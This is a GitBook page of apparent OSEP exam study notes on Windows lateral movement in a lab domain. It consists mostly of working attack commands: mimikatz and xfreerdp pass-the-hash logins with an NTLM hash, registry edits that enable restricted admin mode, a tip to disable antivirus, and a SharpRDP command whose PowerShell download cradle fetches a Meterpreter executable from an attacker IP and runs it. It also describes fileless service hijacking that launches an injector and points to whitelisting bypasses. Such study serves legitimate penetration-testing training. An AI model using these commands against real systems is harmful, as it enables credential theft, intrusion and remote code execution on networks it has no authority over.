# Windows Lateral Movement

## RDP (GUI)

{% hint style="info" %}
If we have gained access to clear text credentials for a domain user and that user is a local administrator of the target machine, we can simply use *mstsc.exe* (the native RDP application) to gain access to that machine.
{% endhint %}

{% hint style="info" %}
When an RDP connection is created, the NTLM hashes will reside in memory for the duration of the session.  If we happen to compromise a well-used server (like a *jump server*), we could dump any of those cached credentials as well.
{% endhint %}

{% content-ref url="<https://app.gitbook.com/s/uatj6rP1wEwZjNEyJjaB/general/common-operations-tty-ssh-rbash>" %}
[Common Operations (tty, SSH, rbash)](https://app.gitbook.com/s/uatj6rP1wEwZjNEyJjaB/general/common-operations-tty-ssh-rbash)
{% endcontent-ref %}

### Turn on SMB (for impacket psexec / cme/nxc)

```powershell
Set-SmbServerConfiguration -EnableSMB2Protocol $true
```

{% hint style="info" %}
rmb to [turn off AV protections](https://osnotes.jackielam.net/osep/attack/evasions) in prior to use *impacket-psexec*
{% endhint %}

### with Admin NTLM hash connecting to next victim

{% hint style="info" %}
Restricted admin mode (default disabled) allows system administrators to perform a *network login* with RDP which does not require clear text credentials and will not store them in memory, essentially disabling single sign-on. This type of login is commonly used by service accounts.

While restricted admin mode protects against credential theft on the target, it is now possible to pass the hash when doing lateral movement with mstsc.
{% endhint %}

{% code title="@windows hacked victim" overflow="wrap" %}

```
privilege::debug
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

Clicking *Connect* opens an RDP session on {next victim hostname} as *admin*, achieving lateral movement with the native RDP client in Windows with only the NTLM hash.

{% code title="@kali when can reach next" overflow="wrap" %}

```
xfreerdp /u:admin /pth:2892D26CDF84D7A70E2EB3B9F05C425E /v:192.168.120.6 /cert-ignore
```

{% endcode %}

#### Enable restricted admin mode

1\) launch shell instance in admin user context

{% code overflow="wrap" %}

```
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:powershell
```

{% endcode %}

2\) shell access to next victim

{% code overflow="wrap" %}

```powershell
Enter-PSSession -Computer {next victim hostnam
```

{% endcode %}

3\) create the registry entry & quit session

{% code title="@next victim" overflow="wrap" %}

```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Exit

#alternative way
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f 
```

{% endcode %}

## RDP Console

Use SharpRDP to execute a PowerShell download cradle on appsrv01 that pulls the Meterpreter executable and subsequently executes it with stacked commands

```
host shell exe in web ser, set up listner
```

{% code overflow="wrap" %}

```
sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=corp1\dave password=lab
```

{% endcode %}

## Fileless (admin -> SYSTEM)

PsExec authenticates to *SMB* on the target host and accesses the *DCE/RPC* interface. PsExec will use this interface to access the service control manager, create a new service, and execute it. As part of the attack, the binary that is executed by the service is copied to the target host.

We can execute our code without registering a new service by updating the binary of an existing service and start the modified service with our target binary. Since we control the service binary, we can use a PowerShell download cradle to avoid saving a file to disk.&#x20;

{% embed url="<https://github.com/Mr-Un1k0d3r/SCShell>" %}
need valid account
{% endembed %}

{% embed url="<https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Fileless%20Lateral%20Movement/Program.cs>" %}
PSLessExec
{% endembed %}

<pre><code>Lat.exe file05/dc02 SensorService “C:\temp\<a data-footnote-ref href="#user-content-fn-1">inj.exe</a>”
</code></pre>

If endpoint protections such as application whitelisting are in place, this approach may not be as straightforward and may require a bypass (such as the use of [InstallUtil ](https://osnotes.jackielam.net/osep/attack/evasions/application-whitelisting-bypass/powershell-language-mode#clm-bypass-with-custom-runspaces-and-installutil-abuse-to-bypass-applock-rule)or an [XSL transform](https://osnotes.jackielam.net/osep/attack/evasions/application-whitelisting-bypass/applocker-bypass-with-jscript#by-extensible-stylesheet-language-.xsl-through-xls-transformation-xslt)).

[^1]: [c-process-injection](https://osnotes.jackielam.net/osep/attack/evasions/c-process-injection "mention")